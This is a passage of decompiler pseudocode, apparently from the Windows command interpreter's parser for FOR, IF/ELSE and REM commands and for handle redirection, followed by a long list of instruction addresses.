							__eflags =  *0x1213cc9;
							__eax = 0x25;
							if( *0x1213cc9 != 0) {
								__edi = 0;
								__edi = 1;
								__eflags = 1;
								while(1) {
									__imp___wcsicmp(L"/L");
									_pop(__ecx);
									__ecx = 0x120faa0;
									__eflags = __eax;
									if(__eax == 0) {
										goto L32;
									}
									L9:
									__imp___wcsicmp(L"/D");
									_pop(__ecx);
									__ecx = 0x120faa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000002;
										L27:
										__ecx = 0;
										__eax = E011DF030(0);
										while(1) {
											__imp___wcsicmp(L"/L");
											_pop(__ecx);
											__ecx = 0x120faa0;
											__eflags = __eax;
											if(__eax == 0) {
												goto L32;
											}
											goto L9;
										}
										goto L32;
									}
									__imp___wcsicmp(L"/F");
									_pop(__ecx);
									__ecx = 0x120faa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000008;
										__ecx = 0;
										__eax = E011DF030(0);
										__ax =  *0x120faa0;
										__ecx = 0x25;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											continue;
										} else {
											__ecx = 0x2f;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__eflags = __esi[0x26];
												if(__esi[0x26] != 0) {
													__eax = E011F82EB(__ecx);
												}
												__eax =  *0x120fa8c;
												__ecx = 6 +  *0x120fa8c * 2;
												__eax = E011E00B0(__ecx);
												__eflags = __eax;
												if(__eax == 0) {
													goto L212;
												} else {
													__edx =  *0x120fa8c;
													__edx =  &(( *0x120fa8c)[1]);
													goto L26;
												}
											}
										}
										goto L218;
									} else {
										__imp___wcsicmp(L"/R");
										_pop(__ecx);
										__ecx = 0x120faa0;
										__ecx = __esi[0x24];
										__eflags = __eax;
										if(__eax == 0) {
											__esi[0x24] = __ecx;
											__ecx = 0;
											__eax = E011DF030(0);
											__eflags = __esi[0x26];
											if(__esi[0x26] != 0) {
												__eax = E011F82EB(__ecx);
											}
											__ax =  *0x120faa0;
											__ecx = 0x25;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__ecx = 0x2f;
												__eflags = __ax - __cx;
												if(__ax == __cx) {
													continue;
												} else {
													__eax =  *0x120fa8c;
													__ecx = 2 +  *0x120fa8c * 2;
													__eax = E011E00B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														L212:
														__eax = E011F9287(__ecx);
														__imp__longjmp(0x120b8b8, __edi);
														goto L213;
													} else {
														__edx =  *0x120fa8c;
														__edx =  &(( *0x120fa8c)[0]);
														L26:
														__ecx = __eax;
														__esi[0x26] = __eax;
														__eax = E011E1040(__eax, __edx, 0x120faa0);
														goto L27;
													}
												}
											}
											goto L218;
										} else {
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 8;
												if(__ecx != 8) {
													__eflags = __ecx - 2;
													if(__ecx != 2) {
														__eflags = __ecx - __edi;
														if(__ecx != __edi) {
															L213:
															__eflags = __ecx - 6;
															if(__ecx != 6) {
																__eflags = __ecx - 4;
																if(__ecx != 4) {
																	__eax = E011F82EB(__ecx);
																}
															}
														}
													}
												}
											}
										}
									}
									__eax = 0x25;
									goto L15;
									L32:
									__esi[0x24] = __esi[0x24] | __edi;
									goto L27;
								}
							}
							L15:
							__eflags =  *0x120faa0 - __ax;
							if( *0x120faa0 != __ax) {
								L216:
								__eax = E011F82EB(__ecx);
							} else {
								__eax =  *0x120faa2 & 0x0000ffff;
								__eax = iswspace( *0x120faa2 & 0x0000ffff);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									goto L216;
								} else {
									__edx =  *0x120faa2 & 0x0000ffff;
									__ecx = L"=,;";
									__esi[0x22] = __edx;
									__eax = E011DD7D4(__ecx, __edx);
									__eflags = __eax;
									if(__eax != 0) {
										goto L216;
									} else {
										__eflags =  *0x120fa8c - 3;
										if( *0x120fa8c != 3) {
											goto L216;
										}
									}
								}
							}
							__ecx = __esi[0x1c];
							__edi = 0x120faa0;
							_push(0x120faa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E011D9C73(__ecx, __edx);
							__ecx = L"IN";
							__eax = E011D9C4D(L"IN");
							__ecx = __esi[0x1c];
							_push(0x120faa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E011D9C73(__ecx, __edx);
							__eax = E011D9936(__ebx);
							__ecx = L"DO";
							__esi[0x1e] = __eax;
							__eax = E011D9C4D(L"DO");
							__ecx = __esi[0x1c];
							_push(0x120faa0);
							__ecx = __esi[0x1c] + 0x2c;
							__edx = 8;
							__eax = E011E1040(__esi[0x1c] + 0x2c, __edx);
							__ecx = 0x2b;
							__eax = E011DDC74(__ebx, __ecx);
							__esi[0x20] = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E011F82EB(__ecx);
							}
						}
						_pop(__edi);
						__eax = __esi;
						_pop(__esi);
						return __esi;
					} else {
						__imp___wcsicmp(L"FOR/?", 0x120faa0);
						__esp = __esp + 8;
						__eflags = __eax;
						if(__eax == 0) {
							goto L152;
						} else {
							__imp___wcsicmp(L"IF", 0x120faa0);
							__esp = __esp + 8;
							__eflags = __eax;
							if(__eax == 0) {
								L148:
								_pop(__esi);
								__edi = 0;
								__imp___wcsicmp(L"IF/?", __edi, __esi, __ecx);
								_pop(__ecx);
								__ecx = 0x120faa0;
								__eflags = __eax;
								if(__eflags == 0) {
									__eax = 0;
									__edi = 0;
									 *0x120faa4 = __ax;
									__edi = 1;
								}
								__ecx = 0x2c;
								__esi = E011DE9A0(__ecx, __eflags);
								__eflags = __edi;
								if(__edi != 0) {
									__eax = 0x2f;
									 *0x120faa0 = __ax;
									__eax = 0x3f;
									 *0x120faa2 = __ax;
									__eax = 0;
									 *0x120faa4 = __ax;
								} else {
									__ecx = 0;
									__eflags = 0;
									__eax = E011DF030(0);
								}
								__edx = 0x2c;
								__eax = E011DDCE1(__ebx, __edx, __edi);
								__eflags = __al;
								if(__al != 0) {
									__esi[0x1c] = __esi[0x1c] & 0x00000000;
									 *__esi = 0x3c;
									goto L47;
								} else {
									__edi = 0;
									__eflags =  *0x1213cc9 - __al;
									if( *0x1213cc9 == __al) {
										L40:
										__edx = 0;
										__ecx = 0;
										__eflags = 0;
										__eax = E011DF300(__eax, 0, 0, 0);
									} else {
										__imp___wcsicmp(L"/I");
										__ecx = 0x120faa0;
										_pop(__ecx);
										__eflags = __eax;
										if(__eax == 0) {
											__edi = 0;
											__edi = 1;
										} else {
											goto L40;
										}
									}
									__ecx = 0;
									__eax = E011DCDA2(0);
									__esi[0x1e] = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = __edi;
										if(__edi != 0) {
											__eflags =  *__eax - 0x38;
											if( *__eax == 0x38) {
												__eax = __eax[0x1e];
											}
											__eax[0x20] = 2;
										}
									}
									__ecx = 0x2c;
									__eax = E011DDC74(__ebx, __ecx);
									__esi[0x20] = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E011F82EB(__ecx);
									}
									__eax = E011DEEC8();
									__eflags = __eax;
									if(__eax == 0) {
										L47:
										_pop(__edi);
										__eax = __esi;
										_pop(__esi);
										_pop(__ecx);
										return __esi;
									} else {
										__ecx = 0;
										__eax = E011DF030(0);
										__edi = 0x120faa0;
										__imp___wcsicmp(L"ELSE");
										_pop(__ecx);
										__ecx = 0x120faa0;
										__eflags = __eax;
										if(__eax == 0) {
											__eax =  *0x120fa8c;
											__ecx =  *0x120fa8c +  *0x120fa8c;
											__eax = E011E00B0(__ecx);
											__eflags = __eax;
											if(__eax == 0) {
												__eax = E011F9287(__ecx);
												__imp__longjmp(0x120b8b8, 1);
												asm("int3");
												while(1) {
													L165:
													__eax = 0;
													__edx[__ecx] = __ax;
													while(1) {
														__eax = __esi[0xa];
														__esi = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															break;
														}
														__ecx = __esi[2];
														__edi = __ecx;
														__edx =  &(__edi[1]);
														do {
															__ax =  *__edi;
															__edi =  &(__edi[1]);
															__eflags = __ax - __bx;
														} while (__ax != __bx);
														__edi = __edi - __edx;
														__edi = __edi >> 1;
														__eax = E011E22C0(__ebx, __ecx);
														__ecx = __esi[2];
														__edx =  &(__edi[0]);
														__eax = E011E1040(__esi[2], __edx, __eax);
														__eflags = __esi[4] - __ebx;
														if(__esi[4] == __ebx) {
															__edx = __esi[2];
															__ecx = __edx;
															__edi =  &(__ecx[1]);
															do {
																__ax =  *__ecx;
																__ecx =  &(__ecx[1]);
																__eflags = __ax - __bx;
															} while (__ax != __bx);
															__ecx = __ecx - __edi;
															__ecx = __ecx >> 1;
															__ecx = __ecx - 1;
															__eflags = __ecx - 1;
															if(__ecx > 1) {
																__eflags = __edx[__ecx] - 0x3a;
																if(__edx[__ecx] == 0x3a) {
																	goto L165;
																}
															}
														}
													}
													__edi = _v552;
													__esi = _v548;
													__eflags = __esi - 3;
													if(__esi == 3) {
														__eax =  *0x1213cd4;
														_v552 = __eax;
														goto L67;
													} else {
														__ecx = 0x10;
														__eax = E011E00B0(__ecx);
														_v552 = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															L86:
															__ebx = 0;
															__ebx = 1;
														} else {
															__ecx =  *0x1213cd4;
															__eax[6] =  *0x1213cd4;
															 *0x1213cd4 = __eax;
															__eax[4] = __edi;
															 *__eax = __esi;
															L67:
															__edi = __edi[0x1a];
															__eflags = __edi;
															if(__edi != 0) {
																__esi = __esi | 0xffffffff;
																__eflags = __esi;
																do {
																	__eflags = __edi[4] - __ebx;
																	if(__edi[4] != __ebx) {
																		goto L82;
																	} else {
																		__imp___get_osfhandle( *__edi);
																		_pop(__ecx);
																		__eflags = __eax - __esi;
																		if(__eax == __esi) {
																			L170:
																			__edi[4] = __esi;
																			goto L75;
																		} else {
																			__imp___get_osfhandle( *__edi);
																			_pop(__ecx);
																			__eflags = __eax - 0xfffffffe;
																			if(__eax == 0xfffffffe) {
																				goto L170;
																			} else {
																				__ecx =  *__edi;
																				__eax = E011E0178(__eax);
																				__eflags = __eax;
																				if(__eax == 0) {
																					__ecx =  *__edi;
																					__eax = E011F9953(__eax,  *__edi);
																					__eflags = __eax;
																					if(__eax != 0) {
																						goto L73;
																					} else {
																						__imp___get_osfhandle( *__edi, __ebx, __ebx, 1);
																						_pop(__ecx);
																						__eax = SetFilePointer(__eax, ??, ??, ??);
																						__eflags = __eax - __esi;
																						if(__eax != __esi) {
																							goto L73;
																						} else {
																							__esi = 0x1213d00;
																							__eax = E011E274C(0x1213d00, 0x104, L"%d",  *__edi);
																							_push(0x1213d00);
																							_push(1);
																							_push(0x40002721);
																							goto L182;
																						}
																					}
																				} else {
																					L73:
																					__ecx =  *__edi;
																					__eax = E011DDBCE(__eax,  *__edi);
																					__edi[4] = __eax;
																					__eflags = __eax - __esi;
																					if(__eax == __esi) {
																						__esi = 0x1213d00;
																						__eax = E011E274C(0x1213d00, 0x104, L"%d",  *__edi);
																						_push(0x1213d00);
																						_push(1);
																						_push(0x2344);
																						L182:
																						__eax = E011DC5A2(__ecx);
																						__esp = __esp + 0x1c;
																						__edi[4] = __ebx;
																						__eax = E011DD937();
																						goto L86;
																					} else {
																						__ecx =  *__edi;
																						__eax = E011DDB92( *__edi);
																						L75:
																						__ecx = __edi[2];
																						__eflags =  *__ecx - 0x26;
																						if( *__ecx == 0x26) {
																							__eax = 0;
																							__ecx[2] = __ax;
																							__eax = __edi[2];
																							__edx =  *__edi;
																							__ecx = __eax[1] & 0x0000ffff;
																							__ecx = (__eax[1] & 0x0000ffff) - 0x30;
																							__eax = E011DDBFC((__eax[1] & 0x0000ffff) - 0x30, __edx);
																							__eflags = __eax - __esi;
																							if(__eax != __esi) {
																								goto L82;
																							} else {
																								goto L183;
																							}
																						} else {
																							__eflags = __edi[8] - 0x3c;
																							_push(__ecx);
																							if(__edi[8] == 0x3c) {
																								__edx = 0x8000;
																								__eax = E011DD120(__ecx, 0x8000);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax != __esi) {
																									goto L79;
																								} else {
																									__ecx = L"DPATH";
																									__eax = E011E3320(L"DPATH");
																									__eflags = __eax;
																									if(__eax == 0) {
																										goto L184;
																									} else {
																										__ecx = _v24;
																										__eflags = __ecx;
																										if(__ecx == 0) {
																											__ecx =  &_v544;
																										}
																										__eax = SearchPathW(__eax, __edi[2], __ebx, _v16, __ecx, __ebx);
																										__eflags = __eax;
																										if(__eax == 0) {
																											goto L184;
																										} else {
																											__ecx = _v24;
																											__eflags = __ecx;
																											if(__ecx == 0) {
																												__ecx =  &_v544;
																											}
																											_push(__ecx);
																											__edx = 0x8000;
																											goto L78;
																										}
																									}
																								}
																							} else {
																								__edi[6] =  ~(__edi[6]);
																								asm("sbb edx, edx");
																								__edx =  ~(__edi[6]) & 0xfffffe09;
																								__edx = ( ~(__edi[6]) & 0xfffffe09) + 0x301;
																								__eflags = __edx;
																								L78:
																								__eax = E011DD120(__ecx, __edx);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax == __esi) {
																									L184:
																									__eax = E011DD937();
																									__ecx =  *0x1213cf0;
																									__eax = E011F985A( *0x1213cf0);
																									goto L86;
																								} else {
																									L79:
																									__eflags = __eax -  *__edi;
																									if(__eax !=  *__edi) {
																										__edx =  *__edi;
																										__ecx = __eax;
																										__eax = E011DDBFC(__eax,  *__edi);
																										__ecx = _v548;
																										__esi = __eax;
																										__eax = E011DDB92(_v548);
																										__eflags = __esi - 0xffffffff;
																										if(__esi == 0xffffffff) {
																											L183:
																											__eax = E011DD937();
																											__esi = 0x1213d00;
																											E011E274C(0x1213d00, 0x104, L"%d",  *__edi) = E011DC5A2(__ecx, 0x2344, 1, 0x1213d00);
																											goto L86;
																										} else {
																											__eax =  *__edi;
																											__esi = __esi | 0xffffffff;
																											goto L80;
																										}
																									} else {
																										L80:
																										__eflags = __eax - __esi;
																										if(__eax == __esi) {
																											goto L184;
																										} else {
																											__ecx = _v552;
																											_v552[2] = __eax;
																											goto L82;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L83;
																	L82:
																	__eax = __edi[0xa];
																	__edi = __eax;
																	__eflags = __eax;
																} while (__eax != 0);
															}
														}
													}
													L83:
													__imp__??_V@YAXPAX@Z(_v24);
													_pop(__ecx);
													__ecx = _v4;
													__eax = __ebx;
													_pop(__edi);
													_pop(__esi);
													__ecx = _v4 ^ __ebp;
													__eflags = __ecx;
													_pop(__ebx);
													__eax = E011E6FD0(__ebx, __ebx, __ecx, __edx, __edi, __esi);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
													goto L218;
												}
											} else {
												__edx =  *0x120fa8c;
												__ecx = __eax;
												__esi[0x22] = __eax;
												__eax = E011E1040(__eax,  *0x120fa8c, 0x120faa0);
												__ecx = 0x2c;
												__eax = E011DDC74(__ebx, __ecx);
												__esi[0x24] = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													__eax = E011F82EB(__ecx);
												}
												goto L47;
											}
										} else {
											__edx = 0;
											__ecx = 0;
											__eflags = 0;
											__eax = E011DF300(__eax, 0, 0, 0);
											goto L47;
										}
									}
								}
							} else {
								__imp___wcsicmp(L"IF/?", 0x120faa0);
								__esp = __esp + 8;
								__eflags = __eax;
								if(__eax == 0) {
									goto L148;
								} else {
									__imp___wcsicmp(L"REM", 0x120faa0);
									__esp = __esp + 8;
									__eflags = __eax;
									if(__eax == 0) {
										L138:
										_pop(__esi);
										__edi = 0;
										__imp___wcsicmp(L"REM/?", __edi, __esi, __ecx);
										_pop(__ecx);
										__ecx = 0x120faa0;
										__eflags = __eax;
										if(__eflags == 0) {
											__eax = 0;
											__edi = 0;
											 *0x120faa6 = __ax;
											__edi = 1;
										}
										__ecx = 0x2d;
										__esi = E011DE9A0(__ecx, __eflags);
										__eflags = __edi;
										if(__edi != 0) {
											__eax = 0x2f;
											 *0x120faa0 = __ax;
											__eax = 0x3f;
											 *0x120faa2 = __ax;
											__eax = 0;
											 *0x120faa4 = __ax;
										} else {
											__ecx = 0;
											__eflags = 0;
											__eax = E011DF030(0);
										}
										__edx = 0x2d;
										__eax = E011DDCE1(__ebx, __edx, __edi);
										__eflags = __al;
										if(__al != 0) {
											__esi[0x1c] = __esi[0x1c] & 0x00000000;
											 *__esi = 0x3c;
											goto L95;
										} else {
											__edx = 0;
											__ecx = 0;
											__eax = E011DF300(__eax, 0, 0, 0);
											__eax = E011DEEC8();
											__eflags = __eax;
											if(__eax == 0) {
												L95:
												_pop(__edi);
												__eax = __esi;
												_pop(__esi);
												_pop(__ecx);
												return __esi;
											} else {
												__ecx = 0x20;
												__eax = E011DF030(__ecx);
												__eflags = __eax - 0x4000;
												if(__eax != 0x4000) {
													__edx = 0;
													__ecx = 0;
													__eax = E011DF300(__eax, 0, 0, 0);
													goto L95;
												} else {
													__eax =  *0x120fa8c;
													__ecx =  *0x120fa8c +  *0x120fa8c;
													__eax = E011E00B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														__eax = E011F9287(__ecx);
														__imp__longjmp(0x120b8b8, 1);
														asm("int3");
														__eflags = __esi;
														if(__esi != 0) {
															__eax = 0;
															 *__ebx = __ax;
														}
														_pop(__edi);
														_pop(__esi);
														__eax = __ebx;
														_pop(__ebx);
														return __ebx;
													} else {
														__edx =  *0x120fa8c;
														__ecx = __eax;
														__esi[0x1e] = __eax;
														__eax = E011E1040(__eax,  *0x120fa8c, 0x120faa0);
														goto L95;
													}
												}
											}
										}
									} else {
										__imp___wcsicmp(L"REM/?", 0x120faa0);
										__esp = __esp + 8;
										__eflags = __eax;
										if(__eax == 0) {
											goto L138;
										} else {
											_pop(__esi);
											_push(__ebp);
											__ebp = __esp;
											__esp = __esp - 0x14;
											_push(__ebx);
											_push(__esi);
											__eax =  &_v16;
											_v16 = 0;
											_push(__edi);
											__ecx = 0;
											__eflags = 0;
											_v12 =  &_v16;
											__ebx = E011DE9A0(0, 0);
											_v20 = __ebx;
											while(1) {
												__eax = E011DEEC8();
												__eflags = __eax;
												if(__eax == 0) {
													break;
												}
												__ecx = 1;
												__eax = E011DF030(1);
												__eflags = __eax - 0x4000;
												if(__eax == 0x4000) {
													__ecx = __ebx[0x1e];
													__edi =  *0x120fa8c;
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx =  &(__ecx[1]);
														do {
															__ax =  *__ecx;
															__ecx =  &(__ecx[1]);
															__eflags = __ax;
														} while (__ax != 0);
														__ecx = __ecx - __edx;
														__edi = __edi + __ecx;
													}
													__ecx = __edi + __edi;
													__esi = E011E00B0(__ecx);
													_v8 = __esi;
													__eflags = __esi;
													if(__esi == 0) {
														__eax = E011F9287(__ecx);
														__imp__longjmp(0x120b8b8, 1);
														asm("int3");
														__eflags =  *0x120fa90;
														if( *0x120fa90 != 0) {
															__eax = E011F82EB(__ecx);
														}
														__eax = 0;
														__eflags = 0;
														__eflags =  *0x120fa88;
														 *0x11fd5c8 = 0;
														if( *0x120fa88 != 0) {
															__edx = 0;
															__ecx = __esi;
															__eax = E011F8121(__esi, 0);
														}
														__eax = __esi;
														_pop(__edi);
														_pop(__esi);
														_pop(__ebx);
														_pop(__ebp);
														return __eax;
													} else {
														__ecx = __ebx[0x1e];
														__eflags = __ecx;
														if(__ecx != 0) {
															__edx = __edi;
															__ecx = __esi;
															__eax = E011E1040(__esi, __edi, __esi);
														}
														__eax = 0;
														__eflags = __edi;
														if(__edi == 0) {
															L195:
															__eax = 0x80070057;
														} else {
															__eflags = __edi - 0x7fffffff;
															if(__edi > 0x7fffffff) {
																goto L195;
															}
														}
														__eflags = __eax;
														if(__eax < 0) {
															L198:
															__edx = 0;
														} else {
															__eax = 0;
															__ecx = __edi;
															__edx = __esi;
															__eflags = __edi;
															if(__edi == 0) {
																L197:
																__eax = 0x80070057;
																goto L198;
															} else {
																while(1) {
																	__eflags =  *__edx - __ax;
																	if( *__edx == __ax) {
																		break;
																	}
																	__edx =  &(__edx[1]);
																	__ecx = __ecx - 1;
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		continue;
																	} else {
																		goto L197;
																	}
																	goto L114;
																}
																__eflags = __ecx;
																if(__ecx == 0) {
																	goto L197;
																} else {
																	__edx = __edi;
																	__edx = __edi - __ecx;
																	__eflags = __edx;
																}
															}
														}
														L114:
														__eflags = __eax;
														if(__eax >= 0) {
															__eax = _v8;
															__esi = __edi;
															__eax =  &(_v8[__edx]);
															__esi = __edi - __edx;
															__eflags = __esi;
															if(__esi == 0) {
																L120:
																__eax = __eax - 2;
															} else {
																__ecx = __esi;
																__edx =  &(__edx[0x3fffffff]);
																__ecx = __esi - __edi;
																__edi = 0x120faa0;
																__edx = __edx + __ecx;
																__edi = 0x120faa0 - __eax;
																__eflags = 0x120faa0;
																while(1) {
																	__eflags = __edx;
																	if(__edx == 0) {
																		break;
																	}
																	__ecx =  *(__edi + __eax) & 0x0000ffff;
																	__eflags = __cx;
																	if(__cx == 0) {
																		break;
																	} else {
																		 *__eax = __cx;
																		__edx = __edx - 1;
																		__eax =  &(__eax[1]);
																		__esi = __esi - 1;
																		__eflags = __esi;
																		if(__esi != 0) {
																			continue;
																		} else {
																			goto L120;
																		}
																	}
																	goto L122;
																}
																__eflags = __esi;
																if(__esi == 0) {
																	goto L120;
																}
															}
															L122:
															__esi = _v8;
															__ecx = 0;
															__eflags = 0;
															 *__eax = __cx;
														}
														__ebx[0x1e] = __esi;
														continue;
													}
												} else {
													__esi = _v12;
													__ecx = __esi;
													__eax = E011E02B0(__ebx, __esi, __edi, __esi);
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *__esi;
														do {
															_t77 =  &(__eax[0xa]); // 0x14
															__ebx = _t77;
															__eax =  *__ebx;
															_v12 = __ebx;
															__eflags = __eax;
														} while (__eax != 0);
														__ebx = _v20;
														continue;
													} else {
														__edx = 0;
														__ecx = 0;
														__eflags = 0;
														__eax = E011DF300(__eax, 0, 0, __eax);
														break;
													}
												}
												goto L218;
											}
											__eax = _v16;
											_pop(__edi);
											__ebx[0x1a] = _v16;
											__eax = __ebx;
											_pop(__esi);
											_pop(__ebx);
											__esp = __ebp;
											_pop(__ebp);
											return __ebx;
										}
									}
								}
							}
						}
					}
				}
				L218:
			}























                                                    0x011e04a0
                                                    0x011e04a0
                                                    0x011e04ab
                                                    0x011e0557
                                                    0x011e055d
                                                    0x011e0561
                                                    0x011e05da
                                                    0x011e05de
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e0563
                                                    0x011e0563
                                                    0x011e0563
                                                    0x011e056d
                                                    0x011e056f
                                                    0x011e0571
                                                    0x011e852b
                                                    0x011e8537
                                                    0x011e853d
                                                    0x011e853e
                                                    0x011e8541
                                                    0x011e8543
                                                    0x011e8546
                                                    0x011e8548
                                                    0x011e8548
                                                    0x011e854a
                                                    0x011e854a
                                                    0x011e854c
                                                    0x011e854e
                                                    0x011e854e
                                                    0x011e8553
                                                    0x011e8553
                                                    0x011e8556
                                                    0x011e855a
                                                    0x011e8560
                                                    0x011e8560
                                                    0x011d480e
                                                    0x011e0577
                                                    0x011e0577
                                                    0x011e057f
                                                    0x011e05e9
                                                    0x011e05ef
                                                    0x011e0581
                                                    0x011e0581
                                                    0x011e0590
                                                    0x011e0595
                                                    0x011e059a
                                                    0x011e059a
                                                    0x011e05a8
                                                    0x011e05aa
                                                    0x011e05af
                                                    0x011e05af
                                                    0x011e05b9
                                                    0x011e05bc
                                                    0x011e05bf
                                                    0x011e05d0
                                                    0x011e05d3
                                                    0x011e05c1
                                                    0x011e05c6
                                                    0x011e05cb
                                                    0x011e05ce
                                                    0x011e05e0
                                                    0x011e05e0
                                                    0x011e05e5
                                                    0x011e05e8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e05ce
                                                    0x011e05bf
                                                    0x011e0571
                                                    0x011e04b1
                                                    0x011e04bb
                                                    0x011e04c1
                                                    0x011e04c4
                                                    0x011e04c6
                                                    0x011e05f3
                                                    0x011e05f3
                                                    0x011d9a34
                                                    0x011d9a36
                                                    0x011d9a3c
                                                    0x011d9a3d
                                                    0x011d9a3e
                                                    0x011d9a40
                                                    0x011f1093
                                                    0x011f1095
                                                    0x011f1097
                                                    0x011f109d
                                                    0x011f109d
                                                    0x011d9a48
                                                    0x011d9a49
                                                    0x011d9a58
                                                    0x011d9a5c
                                                    0x011d9a5d
                                                    0x011d9a5f
                                                    0x011f10a3
                                                    0x011f10ab
                                                    0x011f10ac
                                                    0x011f10b2
                                                    0x011f10b4
                                                    0x011d9a65
                                                    0x011d9a65
                                                    0x011d9a65
                                                    0x011d9a67
                                                    0x011d9a67
                                                    0x011d9a6e
                                                    0x011d9a6f
                                                    0x011d9a74
                                                    0x011d9a76
                                                    0x011f10bf
                                                    0x011f10c3
                                                    0x011d9a7c
                                                    0x011d9a7c
                                                    0x011d9a80
                                                    0x011d9a89
                                                    0x011d9a8a
                                                    0x011d9a8c
                                                    0x011d9a8e
                                                    0x011d9a8e
                                                    0x011d9a8f
                                                    0x011d9a99
                                                    0x011d9a9f
                                                    0x011d9aa0
                                                    0x011d9aa1
                                                    0x011d9aa3
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9aa9
                                                    0x011d9ab3
                                                    0x011d9ab9
                                                    0x011d9aba
                                                    0x011d9abb
                                                    0x011d9abd
                                                    0x011d9c3b
                                                    0x011d9c19
                                                    0x011d9c19
                                                    0x011d9c1b
                                                    0x011d9a8f
                                                    0x011d9a99
                                                    0x011d9a9f
                                                    0x011d9aa0
                                                    0x011d9aa1
                                                    0x011d9aa3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9aa3
                                                    0x00000000
                                                    0x011d9a8f
                                                    0x011d9acd
                                                    0x011d9ad3
                                                    0x011d9ad4
                                                    0x011d9ad5
                                                    0x011d9ad7
                                                    0x011d9bb9
                                                    0x011d9bbd
                                                    0x011d9bbf
                                                    0x011d9bc4
                                                    0x011d9bcc
                                                    0x011d9bcd
                                                    0x011d9bd0
                                                    0x00000000
                                                    0x011d9bd6
                                                    0x011d9bd8
                                                    0x011d9bd9
                                                    0x011d9bdc
                                                    0x00000000
                                                    0x011d9be2
                                                    0x011d9be2
                                                    0x011d9be6
                                                    0x011d9c46
                                                    0x011d9c46
                                                    0x011d9be8
                                                    0x011d9bed
                                                    0x011d9bf4
                                                    0x011d9bf9
                                                    0x011d9bfb
                                                    0x00000000
                                                    0x011d9c01
                                                    0x011d9c01
                                                    0x011d9c07
                                                    0x00000000
                                                    0x011d9c07
                                                    0x011d9bfb
                                                    0x011d9bdc
                                                    0x00000000
                                                    0x011d9add
                                                    0x011d9ae7
                                                    0x011d9aed
                                                    0x011d9aee
                                                    0x011d9aef
                                                    0x011d9af2
                                                    0x011d9af4
                                                    0x011f10d1
                                                    0x011f10d4
                                                    0x011f10d6
                                                    0x011f10db
                                                    0x011f10df
                                                    0x011f10e1
                                                    0x011f10e1
                                                    0x011f10e6
                                                    0x011f10ee
                                                    0x011f10ef
                                                    0x011f10f2
                                                    0x00000000
                                                    0x011f10f8
                                                    0x011f10fa
                                                    0x011f10fb
                                                    0x011f10fe
                                                    0x00000000
                                                    0x011f1104
                                                    0x011f1104
                                                    0x011f1109
                                                    0x011f1110
                                                    0x011f1115
                                                    0x011f1117
                                                    0x011f1127
                                                    0x011f1127
                                                    0x011f1132
                                                    0x00000000
                                                    0x011f1119
                                                    0x011f1119
                                                    0x011f111f
                                                    0x011d9c0a
                                                    0x011d9c0f
                                                    0x011d9c11
                                                    0x011d9c14
                                                    0x00000000
                                                    0x011d9c14
                                                    0x011f1117
                                                    0x011f10fe
                                                    0x00000000
                                                    0x011d9afa
                                                    0x011d9afa
                                                    0x011d9afc
                                                    0x011d9afe
                                                    0x011d9b01
                                                    0x011d9c25
                                                    0x011d9c28
                                                    0x011d9c2e
                                                    0x011d9c30
                                                    0x011f1138
                                                    0x011f1138
                                                    0x011f113b
                                                    0x011f1141
                                                    0x011f1144
                                                    0x011f114a
                                                    0x011f114a
                                                    0x011f1144
                                                    0x011f113b
                                                    0x011d9c30
                                                    0x011d9c28
                                                    0x011d9b01
                                                    0x011d9afc
                                                    0x011d9af4
                                                    0x011d9b09
                                                    0x00000000
                                                    0x011d9c41
                                                    0x011d9c41
                                                    0x00000000
                                                    0x011d9c41
                                                    0x011d9a8f
                                                    0x011d9b0a
                                                    0x011d9b0a
                                                    0x011d9b11
                                                    0x011f1154
                                                    0x011f1154
                                                    0x011d9b17
                                                    0x011d9b17
                                                    0x011d9b1f
                                                    0x011d9b25
                                                    0x011d9b26
                                                    0x011d9b28
                                                    0x00000000
                                                    0x011d9b2e
                                                    0x011d9b2e
                                                    0x011d9b35
                                                    0x011d9b3a
                                                    0x011d9b3d
                                                    0x011d9b42
                                                    0x011d9b44
                                                    0x00000000
                                                    0x011d9b4a
                                                    0x011d9b4a
                                                    0x011d9b51
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9b51
                                                    0x011d9b44
                                                    0x011d9b28
                                                    0x011d9b57
                                                    0x011d9b5a
                                                    0x011d9b5f
                                                    0x011d9b60
                                                    0x011d9b63
                                                    0x011d9b64
                                                    0x011d9b69
                                                    0x011d9b6e
                                                    0x011d9b73
                                                    0x011d9b76
                                                    0x011d9b77
                                                    0x011d9b7a
                                                    0x011d9b7b
                                                    0x011d9b80
                                                    0x011d9b85
                                                    0x011d9b8a
                                                    0x011d9b8d
                                                    0x011d9b92
                                                    0x011d9b95
                                                    0x011d9b98
                                                    0x011d9b9b
                                                    0x011d9b9c
                                                    0x011d9ba3
                                                    0x011d9ba4
                                                    0x011d9ba9
                                                    0x011d9bac
                                                    0x011d9bae
